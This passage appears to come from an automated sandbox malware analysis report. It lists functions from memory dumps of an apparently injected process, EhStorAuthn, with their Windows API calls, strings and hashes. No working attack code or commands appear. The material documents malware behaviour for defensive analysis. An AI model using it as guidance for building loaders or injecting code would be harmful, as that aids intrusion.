                                                                          • Instruction ID: 58fc426469e1f3113b9b4e0896a553204c9e98675150b1fefed410c865a4d1c3
                                                                          • Opcode Fuzzy Hash: a2ede0a05b9cc6e92daf99c51b20419e574181b552d31cd8fd50e09fdf8ae0b7
                                                                          • Instruction Fuzzy Hash: 94014E3564930DEFD755CF84C882BA0B735FF45751FA012D9DA409BB43CA615550CBD0
                                                                          Function 006F4200 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 006F4272
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 2c219f7c767eb9b28ee7cd55e6e12fca76fdadb7cb09fab620ab4446465a0343
                                                                          • Instruction ID: 5182438c1b41b5ed45c9c695ade6fb0d8ab6db05f0c972623baf13b65a0c1461
                                                                          • Opcode Fuzzy Hash: 2c219f7c767eb9b28ee7cd55e6e12fca76fdadb7cb09fab620ab4446465a0343
                                                                          • Instruction Fuzzy Hash: 760100B5D0020DE7DB10DBE4DC46FEEB3B99B54308F0042A5E90897281FA35EB188791
                                                                          Function 00709470 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,006F7FAE,00000010,?,?,?,00000044,?,00000010,006F7FAE,?,?,?), ref: 007094D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          • Opcode ID: 36e1d4a0ddf19936b4d3a75e1c6a2c5e51c0e83413618c85429ac14a0ef55fbe
                                                                          • Instruction ID: 83edd72ca6f539cbcadb4b95ffb669fb5dbb94f73331beb05b3b16249b174214
                                                                          • Opcode Fuzzy Hash: 36e1d4a0ddf19936b4d3a75e1c6a2c5e51c0e83413618c85429ac14a0ef55fbe
                                                                          • Instruction Fuzzy Hash: B301D6B2204108BBCB54DF89DC81EEB77EDAF8C750F018218BA09E3241D630F8518BA4
                                                                          Function 006E9D40 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006E9D85
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: e7c93a38abf1228622db36281cc93bc58468f8e600e82b1bd5fe5cc0a4fcf8b5
                                                                          • Instruction ID: a3defd0ec5f12186c4e4114b43896de289a0263124ae0bdc6809c8b02c7ec122
                                                                          • Opcode Fuzzy Hash: e7c93a38abf1228622db36281cc93bc58468f8e600e82b1bd5fe5cc0a4fcf8b5
                                                                          • Instruction Fuzzy Hash: A4F06D73781714B6E23172AAAC03FDBB78C8F81BA1F140525F70CEB2C1D996B95146E9
                                                                          Function 006E9D3B Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006E9D85
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: e6aa190f7e31398a7148b094ed221df3c213dc8f742461f45ac3ce322478bb48
                                                                          • Instruction ID: cef9432ba7d509b87c5ab4194b3e3944107e6f5c62dae03910359566c2fdb5cd
                                                                          • Opcode Fuzzy Hash: e6aa190f7e31398a7148b094ed221df3c213dc8f742461f45ac3ce322478bb48
                                                                          • Instruction Fuzzy Hash: 19F09277681B14B6E23162A5CC03FCB639D8F80B51F250619FB08AB2C1C9E9B9414BB8
                                                                          Function 007093E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C78BFC45,00000007,00000000,00000004,00000000,006F3ADE,000000F4), ref: 0070941C
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 976261c2090beaf7761a7e578b6574be5373c1aea863a2aff8f02f2be9c57ce1
                                                                          • Instruction ID: fadae4b6b5e47ac68350894b423cc8ac3532453618ccd092a3580a836a5774c6
                                                                          • Opcode Fuzzy Hash: 976261c2090beaf7761a7e578b6574be5373c1aea863a2aff8f02f2be9c57ce1
                                                                          • Instruction Fuzzy Hash: C6E06D71600304BBD610EE59DC41EAB37EDEFC5710F004419F918A7281D671B91086B4
                                                                          Function 00709390 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(0070148C,?,?,0070148C,00000000,?,?,0070148C,?,00000104), ref: 007093CF
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: ae3a77b44a70c96677e662bd54acaead76c1205bde67aa46dfc959a20e6bb57e
                                                                          • Instruction ID: 59191a6155c520b81a0215dbded648456a630b0c0ee6d17f2762248b5a78d013
                                                                          • Opcode Fuzzy Hash: ae3a77b44a70c96677e662bd54acaead76c1205bde67aa46dfc959a20e6bb57e
                                                                          • Instruction Fuzzy Hash: 92E09AB2200304BBC614EE99DC42FDB77ACEFC9710F004429F908A7282D631BE108BB9
                                                                          Function 006F7FF0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 006F801C
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 266e54d2a5c894e519d7627c847f60e82b9eb50ec4da42834809acb7b8fb488b
                                                                          • Instruction ID: abda55d484e88593e52090898726728de218edb1fbc8269bb57daa44dfddf182
                                                                          • Opcode Fuzzy Hash: 266e54d2a5c894e519d7627c847f60e82b9eb50ec4da42834809acb7b8fb488b
                                                                          • Instruction Fuzzy Hash: 99E0D8351803081AF6246568DC45BB633595744720F444694B91C8B2C2DDBDE9018250
                                                                          Function 006F7FEA Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 006F801C
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 641f6e492fe71281946ac1ea3c57cb9cc7923bb0bd7ac1f8e6f2013c034e680d
                                                                          • Instruction ID: 9d34ca6bf3b1374dd8abc55c79eebb81b412dc8c5fdc8e4c2d65a63ee96e475b
                                                                          • Opcode Fuzzy Hash: 641f6e492fe71281946ac1ea3c57cb9cc7923bb0bd7ac1f8e6f2013c034e680d
                                                                          • Instruction Fuzzy Hash: EAE026751803082FFA246668DC46FF6335D5B48734F844294BA589B3C2EDFEFA028250
                                                                          Function 006F0AFB Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111), ref: 006F0B07
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                          • Instruction ID: de8fe73397a64c5f0219b8b0846e6265fde62fcd25aea69901a90f9810b8fab9
                                                                          • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                          • Instruction Fuzzy Hash: 8FD0A967B0000C3AAA024984ACC1CFEB72CEB84AAAF004063FB08E2140E6229D020AB0
                                                                          Function 006F7DE0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,006F1A20,00707C7F,>Sp,006F19E6), ref: 006F7E13
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_6e0000_EhStorAuthn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 1610dcf2398de1f62d96a91fadeb4b1a8f7b07416db63a1841ff4ecf216ab0c8
                                                                          • Instruction ID: 3c5109fb6201c3420a18c28396f4bf949fceffcf220d1c6c1530ba8194fa01bf
                                                                          • Opcode Fuzzy Hash: 1610dcf2398de1f62d96a91fadeb4b1a8f7b07416db63a1841ff4ecf216ab0c8
                                                                          • Instruction Fuzzy Hash: 3BD05E712813087BF644A6E5CC07F5A36CD4B50764F098468BA4CDB3C2E865EA204AA9
                                                                          Function 047C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 86e4bb72e3055b942eb4fa63c87621d8c4056e0a1467428530fcf7d4fafe4dda
                                                                          • Instruction ID: b66740453366ca3e759c1fb0cc31d147f02d40d7cbd707ac5daf6f805d97e07f
                                                                          • Opcode Fuzzy Hash: 86e4bb72e3055b942eb4fa63c87621d8c4056e0a1467428530fcf7d4fafe4dda
                                                                          • Instruction Fuzzy Hash: 2EB09B75D015D5C5FB21F760460871779106BD0705F16C075D2130661F4738D1D5E176

                                                                          Non-executed Functions

                                                                          Function 0463DE9C Relevance: 56.5, Strings: 45, Instructions: 243COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499176887.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4630000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                          • API String ID: 0-3558027158
                                                                          • Opcode ID: e712ef6fcedd0167f14caea6d25e31619db7c8f51c9f37ec9da743873ecf1e48
                                                                          • Instruction ID: 7e01e7e4c0dfeea4f872cd07c66a3e3704c385bbc8deb1a7ec0819225f222002
                                                                          • Opcode Fuzzy Hash: e712ef6fcedd0167f14caea6d25e31619db7c8f51c9f37ec9da743873ecf1e48
                                                                          • Instruction Fuzzy Hash: 43A151F04482948AC7158F58A0652AFFFB1EBC6305F15816DE6E6BB243C37E8905CB95
                                                                          Function 047C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: a313b1e56e73aecdbcc9e016482270e8d579dd703e054b9e951fb2d09bad05e9
                                                                          • Instruction ID: 0838e27a130ff355a95f2cd5e82976ad9327e350b1c97520465880af9d073393
                                                                          • Opcode Fuzzy Hash: a313b1e56e73aecdbcc9e016482270e8d579dd703e054b9e951fb2d09bad05e9
                                                                          • Instruction Fuzzy Hash: FC51C4B5E00156BFDB10DFA88C9097EF7B8BB08304B54816DE559E7746E274FE409BA0
                                                                          Function 04832410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: a565b5782e0b1093c81c48619a92b5871a22f33637aac1b46058ffbebfd420a2
                                                                          • Instruction ID: a9e1b6db54377f8e114c12f28d3553769ba0f37f43eb4a774763de6adeedd683
                                                                          • Opcode Fuzzy Hash: a565b5782e0b1093c81c48619a92b5871a22f33637aac1b46058ffbebfd420a2
                                                                          • Instruction Fuzzy Hash: 6A51E5B1A00645AFDF30DF9CC89097EB7F8EB44205B448E99E496D7641E6B4FA40CBA0
                                                                          Function 047B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 047F46FC
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 047F4742
                                                                          • ExecuteOptions, xrefs: 047F46A0
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 047F4787
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 047F4725
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 047F4655
                                                                          • Execute=1, xrefs: 047F4713
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: 18ab5c31531b8d76eed522fd1786162b254ce127551b6554adf6991d7dd3931e
                                                                          • Instruction ID: 1faa7dc06a3b1457147da765b91097207067f9ca0391dc197d7a0ce1540231f9
                                                                          • Opcode Fuzzy Hash: 18ab5c31531b8d76eed522fd1786162b254ce127551b6554adf6991d7dd3931e
                                                                          • Instruction Fuzzy Hash: 63510B716002196BEF24AA68DC99FEE73BCEF54308F040499DA45A7390E770BE458F90
                                                                          Function 047CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction ID: 946d71d189b134fbc13543dfbda6b3efaffd1bf6d540ab27cfc8df5cdd665ebb
                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction Fuzzy Hash: 5481C070E452499EDF24CE68E8927FEBBB5AF45320F18451EF861A73D1D734B8408B50
                                                                          Function 04633B49 Relevance: 8.8, Strings: 7, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499176887.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4630000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AHJ$JKKJ$JUK$KJ[=$NUK[$S#JJ$UKR[
                                                                          • API String ID: 0-2568715265
                                                                          • Opcode ID: 13d4d4ab1fbe26805ea83dc9d5f54d2d3616795f508473ae7966bf8c1dd85d4b
                                                                          • Instruction ID: 2d1848fb7d9ebc23d2e5f8076589b806e327fe8bdfdee46954a5aec26189a59d
                                                                          • Opcode Fuzzy Hash: 13d4d4ab1fbe26805ea83dc9d5f54d2d3616795f508473ae7966bf8c1dd85d4b
                                                                          • Instruction Fuzzy Hash: 471185B080465C8BCF24EF94E4802ECFBB0FB28346F61404DD52ABF245D7785A868F96
                                                                          Function 047AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047F02BD
                                                                          • RTL: Re-Waiting, xrefs: 047F031E
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047F02E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: 7ac158bcd525c328d28267ededb857406a1b82df038541f288c439c068aece75
                                                                          • Instruction ID: e368b0573ea45718023722d121d015cb1fff70f7ab54bf665ba4dbad640b96d0
                                                                          • Opcode Fuzzy Hash: 7ac158bcd525c328d28267ededb857406a1b82df038541f288c439c068aece75
                                                                          • Instruction Fuzzy Hash: 4DE1AC706087419FE725CF28C884B2AB7E1AF88324F144B6DE5A58B3E1E774F855CB52
                                                                          Function 047BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 047F7BAC
                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 047F7B7F
                                                                          • RTL: Resource at %p, xrefs: 047F7B8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 0-871070163
                                                                          • Opcode ID: ef602750cc749f3e4f76122c4245516eede8a8b95973a85ea1673c73c027867c
                                                                          • Instruction ID: 71590d3d16ed0d3dd7ea7b966b39109cb9ee309a388a2e2ffa0352dafda5db34
                                                                          • Opcode Fuzzy Hash: ef602750cc749f3e4f76122c4245516eede8a8b95973a85ea1673c73c027867c
                                                                          • Instruction Fuzzy Hash: 6A41BF317057029FE724DE29CC40BAAB7E5EB89714F100A1DED9ADBB90DB71F8058B91
                                                                          Function 047BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047F728C
                                                                          Strings
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 047F7294
                                                                          • RTL: Re-Waiting, xrefs: 047F72C1
                                                                          • RTL: Resource at %p, xrefs: 047F72A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: 3953c8335f75171907e19ccba35b7d0c236fea929da1a3752f952cbc5579fc9f
                                                                          • Instruction ID: 2c8fa0b5586e83afc21070c55a55024793a22bb49c87595ddab77bdf5b28dd24
                                                                          • Opcode Fuzzy Hash: 3953c8335f75171907e19ccba35b7d0c236fea929da1a3752f952cbc5579fc9f
                                                                          • Instruction Fuzzy Hash: 9041EF31701202AFE724DE65CD41BAAB7A5FB84714F104A19FE95EB780DB60F8429BD2
                                                                          Function 04832300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                                                          • Associated: 00000006.00000002.4499240782.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4750000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: b1f695ca8b3afb5641531305417b1361c78e2345ad899842ab5fa21e08d57348
                                                                          • Instruction ID: 6d7be05a11df1e9d0a6fde8911bb1144611b81b3ce3ad797d959fc6aff0ceb55
                                                                          • Opcode Fuzzy Hash: b1f695ca8b3afb5641531305417b1361c78e2345ad899842ab5fa21e08d57348
                                                                          • Instruction Fuzzy Hash: 723157726001199FDB20DE2DDC44BEE77B8EB44715F444999E849E3240EB30BA449BE1
                                                                          Function 04633AAF Relevance: 6.3, Strings: 5, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4499176887.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_4630000_EhStorAuthn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $9*3$%/"7$&oc!$1$oc'&
                                                                          • API String ID: 0-1518895095
